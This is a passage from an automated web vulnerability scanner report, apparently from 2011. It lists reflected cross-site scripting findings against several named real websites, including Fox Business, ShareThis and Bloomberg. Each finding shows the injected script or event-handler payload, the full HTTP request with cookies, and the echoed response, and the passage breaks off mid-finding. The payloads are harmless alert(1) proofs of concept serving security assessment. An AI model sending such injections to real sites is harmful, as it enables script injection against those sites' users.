GET /server/pixel.htm?fpid=4&sp=4f36b"><script>alert(1)</script>cf6a02d7684&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C6%7C9%7C4%7C1002%7C6%7C1%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15104%7C15105%7C15104%7C15105%7C15104%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1; uid=2931142961646634775; adImpCount=oZ2RNEVNFLw1rkIl8X-P-yLlEJpCYSMxdqNq6lvFdNFh-L3XcPmT4hHXOQgApIlYc3paHra2elvjH7hCid4MB0Y7JvKfSWNYnBltaP_EmvZ3jqED7k2YniAtZPVqfFWyqMSMg2wplko20za_zfIcXaDNf6CpNnts8TY8puNrbeBKdSjyOjws--qAHMHtbI6SyKBbydkRUpjuoBRWw9N2QWlLrIWdOijpjnNbDzxMY_cujCK2ugPRrtIQW8vfBoRxYKn_QpwzLsdSa65JQRSgSqax_mGBSfFmQ_yHDdekCqC92jCfL0XfIi3TKkhnegsTVS37Q_gdeVmm0ScUExZ1lbMOsVdmEL_0OjsXyZIn8546ZEBGWfN7asBcma8YFCDHyX74acgH1t-jhoUfZVFCNjWOWvzW5ZM77GgXH0zm8oWnOar6PZOl9RnITYOFSWGYaDzF7S4neHm1ckG4BLqONRpiMKjy3MU458qcQHaQL-0YgFsDPAGl-fbgR48rnFrJ6wT1IuXC7mrUivjuVTQThVRvdHABpFM3tD1v5DXCzZ64QHqMXP7RMlCGzImxlIQTzRgujrVm0N9W2BwnCL_E1EHZoee2LjdKxjrsrZzN8FgYwoof2TuxobdviXvpMnEv81pDaQWZ60S1K8hgQ0QQAXfu0wxu7TmpeZh8RAxVSexqJ2LLq9JdStUDbLo5lTJfPHD19oyCm6lqmb75TpSqL6pr8ipq7WyxO6Ew-I0HY5wJflUQTdxXpAW4Vnpqg7w44X_zfDuHKSw_Nn3jdP08Szc46mXt1UoqFp0M9jO1k8P42EGyAyRr7YhegJwMQPqqUCJ3ATQBZk5SYexXtpsdy6ax_mGBSfFmQ_yHDdekCqCUBFYqyi1fHJyWiOfcfMTfgr4RpaCyPW_NRBa32FhMmG9vYGefuwSJ954i6NepjOZKvS1xYZ0Ss4Q0D1A3NBoQyX74acgH1t-jhoUfZVFCNnao7o-KEpvjqYDs5soT116oq-KJHQhjQmU4bTdez02J9dQy-ZN7OOs-kGRGl7xpemvhGQ8hzIqlr1IrYQxp-xUYgFsDPAGl-fbgR48rnFrJh-3J1YLh96s2Sov-e5Z1o1RvdHABpFM3tD1v5DXCzZ4xxZ_RffFsDnywN1GkkZV_5Uv_RIvgSU7i6xm2dvbjnkHZoee2LjdKxjrsrZzN8Fjq5xh8lQ54K_u30ofXMDvN81pDaQWZ60S1K8hgQ0QQAeUZzYxmcCX-jt_KTaaPcVoJOvIBlFFRgh0aGkP2j5peH6Nkss0iuJOnMv3-09gfh2rrcKik1-oIrPtZSMAqqQ8JflUQTdxXpAW4Vnpqg7w4_2s4Bpo2uZfDxG0VZFB88Wk-VgL9u-XI58uBKvrz56O3iu9p-J24_EGM6hyagMn2YEmkLg5zZbK-JWIvvwrhwhPnDUjHFB6vhhdIIEEGSp2RC01-sirwoYxJf3ssEn49prH-YYFJ8WZD_IcN16QKoH0UI20YAgyxkHiw8lIAx_mnb-jXXCSXp2vVTXzmr9pZcL6p-XT3jN85vkgaZ8vUd92-2pnQD2n21e-ITIgQL_3JfvhpyAfW36OGhR9lUUI2W0_XCWcb8zsqQ8DimFX-Uu8v7HHrFL4nIbaIJQ_o1sPTa-Xsvzoz7XjqWNTCt3rZYrf92fSu
rscMt_1SV35mtBiAWwM8AaX59uBHjyucWslDB1wwanEOL6qzMCUQo0ieVG90cAGkUze0PW_kNcLNnm1cdjsO0JR2cllZViOXnQ3uVf8tWzflWdHziO5SokVWQdmh57YuN0rGOuytnM3wWK2DU6rMC-wJwy5QPx_qifTzWkNpBZnrRLUryGBDRBAB5WYyOFQ5ZRNL4sHU3RtcuUGDyFx-piXtjZp5ekRGkYdz2wXbubEN_3mjRNBG_Idw8LkqJ96VKyr7U-y-sK8_Lwl-VRBN3FekBbhWemqDvDiLN5_5A8LFSovW3C4K386c_Ql6lVvJ2R2O4nWyUN5iRLeK72n4nbj8QYzqHJqAyfbLD2N_CM7u1mydoDMYTC_mprH-YYFJ8WZD_IcN16QKoM2VicvKbeYEcyMla3yEoQ2RmR_rbYcUwB-9MYK1HnZwScQ9V5hHmJlTe-T75MjzqreTn2hkb9oAtGT_7YF8ZSHJfvhpyAfW36OGhR9lUUI2tqCUb5yc9vn09nLuvbx5GXq1-cHJUfnrcooYGbPAvcjTa-Xsvzoz7XjqWNTCt3rZ7d3RTRs3cZwFLR9Y320UThiAWwM8AaX59uBHjyucWslF1uoT-2LMDmY4614N6HcfVG90cAGkUze0PW_kNcLNnghS3x9ESIRPKJqzarj28HG_LjieMq13s3cgAdN8xM7aQdmh57YuN0rGOuytnM3wWD1crAQAhXFQgOVLYlHadeHzWkNpBZnrRLUryGBDRBAB4AW9z3L32rHXq7G7Z3kib_dL8EW6T8qzMgGN-UfAL4hvOC7fCrKQjypg3ZZDmIIRdMbH4VAaTP3yeuIT8bUYpjNxWhaps5334qiA6przrOBR9dy7mebSJ94duif8USNC67lakY1-Wx08qAAHUQtknHQ7xnjMvY9ljRz8Oso1hdOAl8yAkjzMu60avymcp27zhmAaygIZH6vh6o5wNjgjNdonijTulYljYeiITtnJ-obiQEWW_mIpBZLcLt_p7SN9vijLbJjf63yiGSwbKyG2dGugnhWf2jLB_cEY-73f83M-Qp-ZlRKwcQuBR1ztGiFSZj4LpSPmviro5cgHdk9eJt4MMqelir0IqM1jmPswFFzniMTjL4-dEMDP4r05gYjUzZycDMwIM-JRZdaXayxbU-AwRV7xlAm5ebgZQKvg7WfQ1UAcQ-GE71_vlGriBwl0yRDK3jK3JAuWDuOfs2KJrs13LhVuZ9GXfqJdAYatFTpdnV7arjamYRVy18OpW4nYo4YOSWlJdDfSV-fwq8HgeaN-3cp1FzgjDVOVLZ2VhYwL507hxRulwL5vm7cb7KsO1XFt8hxAzJqAYOCL7WjL0qxTgxm3fdOYdOttFZUxr5r0A9mv0F_QBoXzpi8rJ_c6DrDzy9pG89s1Q06scIKHZgyDJezpNhgVkSmU0kpar5BAJuG6G30x3tmAb2j7nSNJ4ut2MaV0ROqJMzw9NFFerOKSq0jn7Z8ml_Aq0G6qyi-_p_3NfTE1kiDIdgNbUC9syknt2eSBNZW0WI7HO06yZy2SvSB5gCfomHd71CeO9uXWDgvZffEe1VrTUdxOH4gfGVkOqzE_jRzdjQRhmyVCwoc_2QRp83dWLTsWWFAIqAtnczfxrFIRAQH9jWHUPud-tHjVA42UgJXi7E-Ez_fNnbIdhDyg95Mh1WycRjhJXv8ATRtHD8vb9Vg5SwvqNhrNZsvJnUfvCegfWPkjFXygnPnoVxBMRnVTY50l5bdMYetqdZbuYYw5z5lUxbXkdIEwU2hncdLYoeK7ANErfukyrvNB8AfsR6D54cbJAyko95iDfbO-X1OEuSdYaVrz3olMX3vxG0LpmKD-Soh53aYJpCPcsWWbSJo-8gq8nYPQ6ByEPHScXR_eqXeoOaqn2ootB5duWe6vOtfx6TZyGJGsbGD1xkmmTSZiXiOf1UbISqo; 
fc=Son_Yybuxp_4VLqW1c6IRgpgpID-Wq7vfB3O6HP3oULbQqNNvLUmxUNQQBPMgfFerRqQpaKBKyof5NYMw3qm97r0GrmP14kIO_P1S_Kd3R7cCRX28vmQ734FGllQxEga7WNeyCp05SdctLfte-TCTbsP4cT5ImSiiIJxR5UGOwfPwbRnR2LLF13q12TckziOyzAmjEmfIrmEjGls5nEu5ZuyzRHZQdTq6XVtL0hM6YVgYsYM5nTvlmY3l5bk4g84r-nKZ1rQQJqck6Yvy9KW3W91gPk0ifU2Wnpfq4coyDul4J5x1VDDQsLplNf7fxlsqch1kSkJnLuIM5kQxIBrA1AAJ5E2NNXlrPeQUMuax8t_TTqS7k2UZnQ2_qo9uJoS; pf=VuSdOqHBBMMWoIrvMn_lMP-eLv8nBibtrh2G8vjmtdsh8DjSlN9aC82olgy91sxHfR8HsN28iFo6HdZJoYg638wOOBBuwSDcinuc09qjksp0U_b-1nMI4TNTMGgzSCi8Z_hcfr_LjPBbXWGr-7VM9h8ALQwqWImyohuBQ27Y8Xw0cbFZZKJtQQndzE8GAKdmqCjC1Wmwdc7KyhZThEI6g8GR1G8u2_QHuqkmg4cRHp75P-oeEBUVDf5VwU9xuwcSHhDFJb2XUqEkLs7Domz_q3w_15kKm0BgK3JfnZEKs8fymw6sA4DbktT-nyiWCSpzKjDia36pxc3U4tO78q_HETEnlSA2STvxexbY71jYrbn4WfHJhGxsiIx-9I1zygek7Pf4A_sSnTuIap-4wUTplqXPpupoZ2aAs6pg_7GbeM0kYG_OQnZuGm01WR15o5NPoS1LMOxRBcktX-fjO0PajgmdjeQBgubJJsY05jsV2l9NZFR3RH9LciXYxcTjJepHfLuMsKI6owruPhF3gPtvzLZ9utGbxF13SV_uKAl4HKsBjKyxKk2G3uw_IYoHmbxATRKbLxavAe3UnLjo4PmSoYSZ7iWo8G3Uu8TuFRx5fRaquBZLTyYvv3Ocb-7--J-VtemUKW9z2kPibwP3gpIns6cCJlO7-0c-0RDCVEYnDUx1i2LElPrZXgQ5Byxk5xNmzexDfMU0BdXw9_SkVC-SNLPKk0ap-tAMXcPQnUmauymyXWJrQVUJgzNmFh7ksHv8OiCkGDhtnY3d1dmbv-udxKiDQTuAB18iFba0UGQ3JYe5Hmk4ucjwm6TjB_9nil97jekIjc-C8BS-uf96oebtAJsE9VJeaYcwjgb-01TibpxqYVdIDX7t5imD4mPAVzRantfh3RXY5XPyQCFOvjBuvXa7BG0yK1vm2RoZoMQreNJPS7GobV7I1cjjbuZswrRZ8pR06vJUoctQlrIJHdmY0phHtKP0mry4AwYHuhrHwtX0hRtaylr7YhxxdojmJl3YDZfqAfbohofv2ZcpScTu7Mv1IaFGZ4TJyXyc3GA7cL-6MReM3fg-Tj3A4SJdGFfIYrH1TzHu0JALHFm29Lz18bNTc21I0stlz_0W7pAuJ_HPjicCNrlo8DjF_CF9jI3kgrT0QZ53DFCYuonDAxoqp153GKXwrRX9BLEvde6VV8zIDZwhAfybaduI4Tjh2o_ApS_PmBayZLHGouKushfucVUk7wDNGMmzj4GVEEX8f-rUMF1anLVD4v4W2G3qart9v0lUhUFtrwAgKmwYbDU6hcnQfk1tudLUowDkoLCasxWjkPLeTOwQyYfFRoGQ1P2wq9MRvhbae96eQc_QL8Y8Frg5X12BeQO3OjFTV291KS2RaPVPOOkGi1geUIVZG9OQnob9Bt0DOsV3G_HCir3Yg1skhTvQ4n3K65vFpt3xYbzFf8Q06hm-RooLiXjgmMQu3eHeZC5CTGrXgCx3rgAsBIoW_gNcvGPrpcTHNsQQMEhxzL-4TqRY8qS_hbJfkUANyjVcq-NSNhuTjXqndliQHUkRx6kaJj4rOszghpKbXwU

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:54 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:39:53 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4321036613896989359&fpid=4&nu=n&t=&sp=4f36b"><script>alert(1)</script>cf6a02d7684&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.117. http://video.foxbusiness.com/v/feed/video/4674822.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.foxbusiness.com
Path:   /v/feed/video/4674822.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 12a45<script>alert(1)</script>f3c8e235d87 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/feed/video/4674822.js?callback=videoPlayer.feed.parse_2284764g_dioediv12a45<script>alert(1)</script>f3c8e235d87&template=grab&cb=20115127 HTTP/1.1
Host: video.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3952
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Thu, 12 May 2011 11:38:37 GMT
Connection: close

videoPlayer.feed.parse_2284764g_dioediv12a45<script>alert(1)</script>f3c8e235d87({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Thu, 12 May 2011 07:38:37 EDT","lastBuildDate":"Thu, 12 May 2011 07:38:37 EDT","generato
...[SNIP]...

4.118. http://wd.sharethis.com/api/getCount2.php [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload ea400<script>alert(1)</script>b2c22e0c34a was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/getCount2.php?cb=stButtons.processCBea400<script>alert(1)</script>b2c22e0c34a&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:36:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 401

stButtons.processCBea400<script>alert(1)</script>b2c22e0c34a({"url":"http:\/\/www.mimecast.com\/News-and-views\/Press-releases\/Dates\/2011\/5\/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director\/","total":0,"ourl":"http:\/\/www.mimec
...[SNIP]...

4.119. http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bfa1d<img%20src%3da%20onerror%3dalert(1)>865705b3363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bfa1d<img src=a onerror=alert(1)>865705b3363 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Directo/bfa1d<img%20src%3da%20onerror%3dalert(1)>865705b3363r%2F HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:36:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 273

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.mimecast.com\/News-and-views\/Press-releases\/Dates\/2011\/5\/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Directo\/bfa1d<img src=a onerror=alert(1)>865705b3363r\/"});

4.120. http://wd.sharethis.com/api/getCount2.php [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 43cd7<img%20src%3da%20onerror%3dalert(1)>8a9a606e3bb was submitted in the url parameter. This input was echoed as 43cd7<img src=a onerror=alert(1)>8a9a606e3bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F43cd7<img%20src%3da%20onerror%3dalert(1)>8a9a606e3bb HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:36:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 271

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.mimecast.com\/News-and-views\/Press-releases\/Dates\/2011\/5\/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director\/43cd7<img src=a onerror=alert(1)>8a9a606e3bb"});

4.121. http://webezines.kwithost.com/sx25Feed.php [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://webezines.kwithost.com
Path:   /sx25Feed.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload bfa61<script>alert(1)</script>31dea62f86d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sx25Feed.php?keyword=Investment%20Firms&format=json&callback=jsonp1305198220594bfa61<script>alert(1)</script>31dea62f86d&_=1305198220619 HTTP/1.1
Host: webezines.kwithost.com
Proxy-Connection: keep-alive
Referer: http://investmentfirmsdirect.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:45 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Content-Length: 2044
Connection: close
Content-Type: text/html; charset=UTF-8

jsonp1305198220594bfa61<script>alert(1)</script>31dea62f86d([{"content_title":"Dodd-Frank Act: Hedge Funds and <b>Investment<\/b> Advisory <b>Firms<\/b>","content_main_content":"The Dodd-Frank Act pro
...[SNIP]...

4.122. http://wolfgreenfield.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wolfgreenfield.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139d0"><script>alert(1)</script>9e5f6c5a037 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico139d0"><script>alert(1)</script>9e5f6c5a037 HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:58 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://wolfgreenfield.com/favicon.ico139d0"><script>alert(1)</script>9e5f6c5a037');" title="Email Page">
...[SNIP]...

4.123. http://wolfgreenfield.com/v_arrow.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wolfgreenfield.com
Path:   /v_arrow.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 848c5"><script>alert(1)</script>79cf0510bfd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v_arrow.gif848c5"><script>alert(1)</script>79cf0510bfd HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:57 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://wolfgreenfield.com/v_arrow.gif848c5"><script>alert(1)</script>79cf0510bfd');" title="Email Page">
...[SNIP]...

4.124. http://wolfgreenfield.com/v_arrow.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wolfgreenfield.com
Path:   /v_arrow.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4fda"><script>alert(1)</script>49e11abb79a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v_arrow.gif?c4fda"><script>alert(1)</script>49e11abb79a=1 HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:56 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://wolfgreenfield.com/v_arrow.gif?c4fda"><script>alert(1)</script>49e11abb79a=1');" title="Email Page">
...[SNIP]...

4.125. http://www.bloomberg.com/apps/data [sgid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloomberg.com
Path:   /apps/data

Issue detail

The value of the sgid request parameter is copied into the HTML document as plain text between tags. The payload c716b<script>alert(1)</script>0bd294ae9c6 was submitted in the sgid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apps/data?pid=trackstoryhits&sgid=LKOO7G0UQVI901c716b<script>alert(1)</script>0bd294ae9c6 HTTP/1.1
Host: www.bloomberg.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hptest2011time=1303930127; OAX=rcHW8024ZQYADEK+; __utmz=30057196.1303930136.1.1.utmcsr=businessweek.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|26DC3287851D34A3-4000010C2016501C[CE]; profFbannerad=1; prodFbannerad=1; _chartbeat2=05vt53emlalrxzsu; opt=no-opt; __utmx=30057196.00013155880168891469:4:9; __utmxx=30057196.00013155880168891469:3825137:2592000; s_sess=%20s_ria%3Dflash%257CSilverlight%25204.0%3B%20s_cc%3Dtrue%3B%20ev1%3Dnews%253Asports%3B%20s_v20%3D2011-05-05%25252000%25253A00%25253A52%252520-0400%3B%20s_sq%3D%3B; DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; rsi_segs=K05539_10579|K05539_10529|K05539_10592; BT=10579&10529&10592; quint386uid=11486149183474481; oo_inv_percent=0; oo_inv_hit=1; __utma=30057196.790518761.1303930135.1303930135.1305200254.2; __utmc=30057196; __utmv=30057196.|2=201012_more_stories=9=1,3=opt=no-opt=1,; __utmb=30057196.5.7.1305200255961

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Cache-Control: max-age=900
Content-Type: text/plain
Content-Length: 71
Date: Thu, 12 May 2011 11:37:51 GMT
Connection: close


Error sgid=LKOO7G0UQVI901c716b<script>alert(1)</script>0bd294ae9c6


4.126. http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
